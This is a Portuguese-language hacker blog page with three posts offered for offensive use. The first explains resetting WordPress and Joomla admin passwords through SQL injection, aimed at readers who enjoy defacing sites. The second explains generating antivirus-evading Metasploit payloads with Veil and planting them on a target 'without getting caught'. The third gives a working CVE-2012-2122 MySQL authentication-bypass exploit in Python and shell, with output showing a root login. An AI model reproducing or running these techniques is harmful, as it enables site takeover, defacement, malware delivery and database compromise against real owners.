Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador Bypass. Mostrar todas as postagens
Mostrando postagens com marcador Bypass. Mostrar todas as postagens

quinta-feira, 30 de julho de 2015

Resetando senha WORDPRESS/JOOMLA via SQL injection

[0x00] Introdução Bom vamos lá esse artigo é bem simples porem bem útil para gurizada que curte um defacement porém não possui muito conhecimento  e que passam um bom tempo ate conseguir "quebrar" um hash dessas CMS.


[0x00] Introdução

Bom vamos lá esse artigo é bem simples porem bem útil para gurizada que curte um defacement porém não possui muito conhecimento  e que passam um bom tempo ate conseguir "quebrar" um hash dessas CMS.

[0x01] Conceito Joomla

Não sei bem se podemos chamar de conceito porém esse termo se encaixa bem e se não me falha a memoria já vi um artigo similar em algum lugar só não me recordo o autor.

[0x01a] A Hash 
   A hash utilizada pelo Joomla é uma especie de MD5 que divide a senha em partes apos o : se o numero de caracteres for impar sera acrescentado um a mais na primeira md5.

[0x01b] Exemplo:
147c6577fd36d90147c4ee3a5a0cceaa:sWTeBV3KGXeCtb6ivBFXKBRhMIJE4O0 a parte em preto corresponde a 0X4 e a parte destacada em vermelho h4x

[0x02] Injeção 

É bem semelhante a uma injeção de SQL normal apenas mudamos as tabela e colunas que vão ser exploradas em um caso normal estaríamos atras de colunas responsável pelo armazenamento do nome de usuário e senha porém dessa vez buscaremos a tabela responsável pelos códigos de ativação e email.

[0x02b] Tabela alvo
 O alvo é _user o nome pode variar porem em 90% dos casos sempre possui _user e vamos pegar as colunas email e activation.
Pegaremos o email e o introduziremos em alvo.ru/index.php?option=com_user&view=reset apos isso é só colocar o código pego na coluna activation e será possível escolher uma nova senha.

[0x03] Conceito Wordpress

Não muda muita coisa da injeção em joomla apenas possui um tipo de hash ate o momento "desconhecida" 

[0x03a] Tabela alvo e colunas
                 a tabela alvo é wp_users e as colunas são user_login user_activation_key.

[0x03b] Resetando 
    é bem semelhante ao joomla apenas muda o caminho por trata se de CMS diferentes primeiro entraremos em alvo.ru/wp-login.php?action=lostpassword e colocaremos o usuário que desejamos mudar a senha usuário obtido na user_login apos isso entraremos em /wp-login.php?action=rp&key=l33ts&login=h4x0r.

[0x04] Explicação Wordpress

Bom creio que todos tenham entendido a parte l33ts e h4x0r mas para os desatentos onde possui l33ts na url você introduz o código correspondente obtido em user_activation_key e onde localiza se H4x0r é o usuário obtido em user_login.

Solução ?
Mantenha seu CMS sempre atualizado e informe-se sobre 
novas falhas .

terça-feira, 17 de dezembro de 2013

Bypass AV com Veil VoidPointer codificação de payload

VEIL
Bypass AV com  Veil VoidPointer codificação  de payload

Véu ou Manto em português.

Após a realização de diversos tipos de codificação da carga, aparentemente, ainda tem aqueles exe que não pode passar por algum anti-vírus e isso é foda, Mas com Veil  uma maneira poderosa para resolver este problema.

ferramenta que nós precisamos é de veil.py

Veil é uma ferramenta desenhada para gerar cargas Metasploit que ignoram soluções comuns anti-vírus.

Linux
Use Kali (x86) e todas as dependências são pré-instalados
ou -
Instale Python 2.7
Instale PyCrypto> = 2,3

Veil foi projetado para rodar em Kali Linux, mas deve funcionar em qualquer sistema capaz de executar scripts python. Basta ligar para Veil a partir da linha de comando, e seguir o menu para gerar uma carga útil. Ao criar o payload, Veil vai perguntar se você gostaria que o arquivo de carga útil a ser convertido em um arquivo executável por PyInstaller ou Py2Exe.

Se estiver usando PyInstaller, Veil irá converter sua carga em um executável dentro de Kali.

Se estiver usando Py2Exe, Veil criará três arquivos:

payload.py - O arquivo de carga útil
setup.py - arquivo necessário para Py2Exe
runme.bat - Batch script para compilar a carga em um executável do Windows
Mova todos os três arquivos em sua máquina Windows com o Python instalado. Todos os três arquivos devem ser colocados na raiz do diretório Python foi instalado (provavelmente C: \ Python27). Execute o script de lote para converter o script Python em um formato executável.

Coloque o arquivo executável em sua máquina-alvo através de todos os meios necessários e não seja pego!

Baixar:
# git clone https://github.com/ChrisTruncer/Veil.git

Instalando:
# cd /Veil/setup/ && setup.sh

sexta-feira, 29 de novembro de 2013

Conheça MySQL Authentication Bypass Exploit.


Conheça MySQL Authentication Bypass Exploit.


MySQL permite a autenticação de qualquer usuário válido (ou seja, root ativos em 99% das instalações) sem a necessidade de senha, utilizando apenas um simples LOOP  de tentativas exaustivo de conexões.

Todas as versões do MySQL e MariaDB até 5.1.61, 5.2.11, 5.3.5, 5.5.22 são vulnerável.
Versões de MariaDB 5.1.62, 5.2.12, 5.3.6, 5.5.23 não são.
Versões do MySQL 5.1.63 de, 5.5.24, 5.6.6 não são.

Esta questão foi atribuído um ID:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122

O que significa que, se alguém sabe um nome de usuário para se conectar (e "root" quase sempre existe), ela pode se conectar usando * qualquer senha * repetindo tentativas de conexão. ~ 300 tentativas leva apenas uma fração de segundo, então basicamente conta a proteção por senha é tão bom como inexistente.

Qualquer cliente vai fazer, não há necessidade de uma biblioteca libmysqlclient especial.

EXPLOIT CÓDIGO PYTHON:

#!/usr/bin/python
import subprocess

  1. import subprocess
  2.  
  3. ipaddr = raw_input("Enter the IP address of the mysql server: ")
  4.  
  5. while 1:
  6.     subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()


EXPLOIT CÓDIGO EM SHELLSCRIPT:

while true; do mysql -u root --password=senha -h 127.0.0.1 2>/dev/null; done


Executando comando exploit em python:

google@inurl:~# python mysql.py
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 24598
Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu)

Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

mysql>

Exploit:
PYTHON
http://pastebin.com/JuHZX7zJ
PHP
http://pastebin.com/CTYx2hUt